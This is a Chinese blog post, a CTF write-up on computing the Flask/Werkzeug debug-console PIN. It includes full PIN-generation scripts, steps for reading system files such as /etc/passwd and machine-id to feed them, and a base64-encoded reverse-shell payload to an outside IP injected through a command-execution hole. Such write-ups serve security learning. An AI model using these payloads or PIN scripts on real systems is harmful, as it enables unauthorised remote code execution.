flask计算pin码

最新推荐文章于 2023-02-20 20:07:23 发布
最新推荐文章于 2023-02-20 20:07:23 发布
阅读量1.9k 收藏 7
点赞数 1
分类专栏: flask计算pin码 文章标签: flask python 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/128881337
版权
文章介绍了如何在Flask的debug模式下生成ping码,涉及到MD5和SHA1两种加密方式,以及通过系统信息如用户名、文件路径等生成密钥的过程。同时,文章提供了一个CTF(网络安全竞赛)的解题过程,包括从源码分析、获取系统信息到执行命令获取flag的步骤。
摘要由CSDN通过智能技术生成

Flask debug模式算pin码_Ys3ter的博客-CSDN博客_flask pin码

可以参考这个链接

ctfshow801

然后这张图非常的重要

 也就是我们需要上面的各个因素,然后获得ping码,也就是console的密码,就可以自己输出命令

 然后会有两个脚本,一个是3.6通过md5加密,一个是3.8通过sha1进行加密

#MD5
import hashlib
from itertools import chain
probably_public_bits = [
     'flaskweb'# username
     'flask.app',# modname
     'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
     '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
     '25214234362297',# str(uuid.getnode()),  /sys/class/net/ens33/address
     '0402a7ff83cc48b41b227763d03b386cb5040585c82f3b99aa3ad120ae69ebaa'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
   h.update(b'pinsalt')
   num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
   for group_size in 5, 4, 3:
       if len(num) % group_size == 0:
          rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                      for x in range(0, len(num), group_size))
          break
       else:
          rv = num

print(rv)

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'root'# /etc/passwd
    'flask.app',# 默认值
    'Flask',# 默认值
    '/usr/local/lib/python3.8/site-packages/flask/app.py' # 报错得到
]

private_bits = [
    '2485377585864',#  /sys/class/net/eth0/address 16进制转10进制
    #machine_id由三个合并(docker就后两个):1./etc/machine-id 2./proc/sys/kernel/random/boot_id 3./proc/self/cgroup
    'ab5474dd-e22b-45df-8316-7ad4e11f978ae78714841cdc523ece942e68660c9777ad13a358f5ea71a8e1d1424efe9a8400'#  /proc/self/cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

开始做题:

看见了绝对地址,和python3.8所以用下面的脚本计算ping码

接下来一步步获取 

/etc/passwd获得用户名

 然后别的跟着获取就行,这里注意一下这个机器id

需要进行拼接的

 这里后面都一样的所以不用多想随便取一个就行 ,然后套脚本

 

转换十进制,用谷歌的console就可以了

 

 导入os模块,这里\n是换行,差点 以为flag文件是nflag哈哈

ShadowFlag

打开界面就是源码,


from flask import Flask, request
import os
from time import sleep

app = Flask(__name__)

flag1 = open("/tmp/flag1.txt", "r")   #打开文件
with open("/tmp/flag2.txt", "r") as f:
    flag2 = f.read()   #flag2应该是flag1.txt的值
tag = False

 
@app.route("/")   #路由选择
def index():
    with open("app.py", "r+") as f://读取app.py的值,所以我们可以看见源码下面有return
        return f.read()


@app.route("/shell", methods=['POST'])#/shell路由  post传参
def shell():
    global tag    #tag全局变量
    if tag != True:  #tag为false进入
        global flag1  #flag1 为全局变量
        del flag1  #删除flag1
        tag = True   #赋值
    os.system("rm -f /tmp/flag1.txt /tmp/flag2.txt")#命令删除二个文件
    action = request.form["act"]   #获取post传参
    if action.find(" ") != -1: # 不能有空格
        return "Nonono"
    else:
        os.system(action) #这里会命令执行,应该可以利用,毕竟act可控
    return "Wow"


@app.errorhandler(404)
def error_date(error):
    sleep(5)
    return "扫扫扫,扫啥东方明珠呢[怒]"


if __name__ == "__main__":
    app.run()

所以现在我们的思路,就是post传参然后执行它

根据代码得知:二个flag文件,感觉flag分成了二段,然后一段flag1 被删除了,flag2还存在

act=echo%09YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTAuNDAuMTkzLjIwMi85OTk5IDA%2bJjE=|base64%09-d|bash

 其实这直接访问console,这一步完全没想出来,看别人也都是直接猜出来的。

 

打通发现,ctf是用户名

 

 然后转换为10进制   2485376947610

a4473a34-a602-43b3-bd38-c11e15f45ae7

 42f44ee9fdafb6557e4b39ff62e0aa5df78925533340fa7c067roaeff31dd90665

然后进行拼接得

 查看条件发现,还缺一个绝对地址

会打开所有得进程,这里也会包含,打开文件但未正常关闭,然后直接删除得一般进程号 为15-18

 

发现了flag1.txt被删除得进程,所以我们 

是当中的第三个然后进行读取 

然后这个报错页面,只要我们不是传参的act都会爆出错误,然后获得了绝对地址

#sha1
import hashlib
from itertools import chain
probably_public_bits = [
    'ctf',# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.10/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485376947675',# str(uuid.getnode()),  /sys/class/net/ens33/address
    'e0ad2d31-1d21-4f57-b1c5-4a9036fbf23516921067cd405eaa654013ea6a0ba8784e311ba26d783724d39843827fce654f'# get_machine_id(), /etc/machine-id
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
    h.update(b"pinsalt")
    num = f"{int(h.hexdigest(), 16):09d}"[:9]

# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = "-".join(
                num[x : x + group_size].rjust(group_size, "0")
                for x in range(0, len(num), group_size)
            )
            break
    else:
        rv = num

print(rv)

 获得pin码

因为源码中的flag2未被删除直接输出就可以了

 解释一下为什么在进程里面:

flag1 = open("/tmp/flag1.txt", "r")   #打开文件
with open("/tmp/flag2.txt", "r") as f:
    flag2 = f.read()   #flag2应该是flag1.txt的值
tag = False

flag1.txt只是打开并没有关闭,而flag2.txt会进行正常的关闭,所以进程中不会出现

参考链接:GitHub - Randark-JMT/NSSCTF-Round_v7-ShadowFlag: A reverse challenge in NSSCTF Round#7

偶尔躲躲乌云334
关注
专栏目录
计算机硬件系统 — 冯诺依曼体系结构运行原理解析
烟云的计算
05-24 3012
值得注意的是,指令系统并非越复杂越好,因为每条 CPU 指令类型都需要特定的晶体管和电路元件来支撑实现,所以指令集越大就会使 CPU 的架构越复杂,执行操作的速度也更慢。但在指令字较短的计算机中,为了能够充分利用指令字的位数,在有限的长度中实现更多的指令集数目,所以其操作长度被设计成是可变的,即把它们的操作在必要的时候扩充到地址字段。此时,段或页的首地址就会存放于基址寄存器中,而指令字的地址就作为段或页的长度,这样只要修改基址寄存器的内容就可以访问到存储器的任意单元了。:存储当前正在执行的指令。
AT32驱动NAND FLASH(以H27U1G8F2B为例)
u014180874的博客
06-28 732
H27U1G8F2B,是一款存储容量1Gbit(128M*8bit)的NAND FLASH。 1、H27U1G8F2B存储架构和地址分配如下图: 存储架构:分为page,block,device几个等级; 地址分配:分为列地址(也就是byte地址–A0A11)和行地址(也就是page地址–A12A17和block地址–A18~A27) 2、AT32 XMC的NAND接口: XMC的NAND接口分为8bit和16bit。这两者的差异仅在于data线是8/16 pin。具体如下表: 3、NAND FLASH
PIN计算锦集
热门推荐
工作博客
08-16 5万+
1、 腾达,C8:3A:35开头的MAC有效~ network路由,MAC有效~ 以及00B00C开头的MAC有效之外的请您自己发现算法。。这里只公布三个MAC地址算法,其余也可以算~这里就不公布出来了。TP-link的路由也有一套自己的算法,这里大家动动脑算吧~ MAC与pin之间确实存在一定的关系,大家多多研究,我想将来很快就会被和谐以及。。。 废话了,公布算法一: 腾达C8:3A
Flask debug模式算pin
遇事不决冲冲冲
03-21 5400
## 什么是PIN pin也就是flask在开启debug模式下,进行代调试模式的进入密,需要正确的PIN才能进入调试模式 ## 如何生成 这里就列一个了,前面全是获取值,最后进行加密,版本不同区别也就就是3.6与3.8的MD5加密和sha1加密不同
深入浅出Flask PIN
蚁景网安学院
08-01 564
最近搞SSTI,发现有的开发开了debug,由此想到了PIN,但一直没有对这个点做一个深入剖析,今天就完整的整理Flask Debug PIN的生成原理与安全问题。PIN是什么?PIN是 Werkzeug(它是 Flask 的依赖项之一)提供的额外安全措施,以防止在不知道 PIN 的情况下访问调试器。您可以使用浏览器中的调试器引脚来启动交互式调试器。请注意,无论如何,您...
PIN计算
09-24
可以计算部分无线路由器8位数字PIN,方便找到无线密
Flask debug 模式生成pin + [GYCTF2020]FlaskApp
ShenZ的博客
09-07 3207
ssti的payload还是不太会写… Flask debug 模式生成pin 计算pin所需要的值为: 1.flask所登录的用户名 2.modname 3.getattr(app, “name”, app.class.name) 4.flask库下app.py的绝对路径 5.当前网络的mac地址的十进制数 6.docker机器id 1.flask所登录的用户名 /etc/passwd 中找到用户名 {% for c in [].__class__.__base__.__subclasses__()
计算机术语翻译在线,常用计算机专业词汇术语翻译
weixin_36264801的博客
06-16 552
原标题:常用计算机专业词汇术语翻译 ESP: Encapsulating Security Payload,压缩安全有效载荷Execute Buffers,执行缓冲区Extended Burst Transactions,增强式突发处理Extended Stereo(扩展式立体声)FADD(Floationg PointAddition,浮点加)FAT(File AllocationTables,...
pin计算详解
12-20
资源包 含有【pin.txt】 文档 详细 描述了 银联8583报文中pin计算过程
pin计算器.rar
04-05
pin计算器.rar
mac计算pin
07-04
mac计算pin工具
ChinaNet-XXXX计算PIN
11-13
利用路由器的MAC地址计算pinPIN 分前4 和后4,先破前4 只有最多一万个组合,破后4 中的前3 只有一千个组 合,一共就是一万一千个密组合。
C83A35密pin计算
05-10
如果你的路由器是C83A35开头的MAC值而且忘记了pin,可以用这个计算器试试运气,我试过100%正确 不要用于不当目的,仅供个人使用,不得破坏他人网络设备
Flask debug 模式 PIN 获取
火柴人的博客
03-30 2342
本文由一道CTF题讲解。 [GYCTF2020]FlaskApp(BUUCTF有原题) 讲解 PIN 机制在 Flask debug 模式 PIN 生成机制安全性研究笔记 一文中有详细的研究。 由官方write up总结出,生成PIN的关键值有如下几个: 服务器运行flask所登录的用户名。 通过/etc/passwd中可以猜测为flaskweb 或者root ,此处用的flaskweb {...
深入浅出Flask PIN
蚁景网安学院
08-01 758
最近搞SSTI,发现有的开发开了debug,由此想到了PIN,但一直没有对这个点做一个深入剖析,今天就完整的整理Flask Debug PIN的生成原理与安全问题。
关于ctf中flaskpin总结
最新发布
arcuied
02-20 5240
flask pin的相关问题
flaskpin攻击——新版本下pin的生成方式
qq_42303523的博客
04-17 4221
在打*CTF的时候,一道明显是flaskpin生成进而RCE的题目卡了半天,最后发现是新版本的flaskpin生成方式有了一定的改变,这里做一下记录。 我们常用的生成pin的脚本如下: import hashlib from itertools import chain probably_public_bits = [ 'root',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', get
创龙TMS320C6655开发板硬件详解:多核DSP性能评估
1. **处理器**:TMS320C6655/C6657是TI公司KeyStone C66x系列的成员,具备强大的定点和浮点运算能力,适用于高性能计算应用。它们在单核和双核配置下分别提供1.0GHz和1.25GHz的运行频率,且引脚兼容,便于不同需求的...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值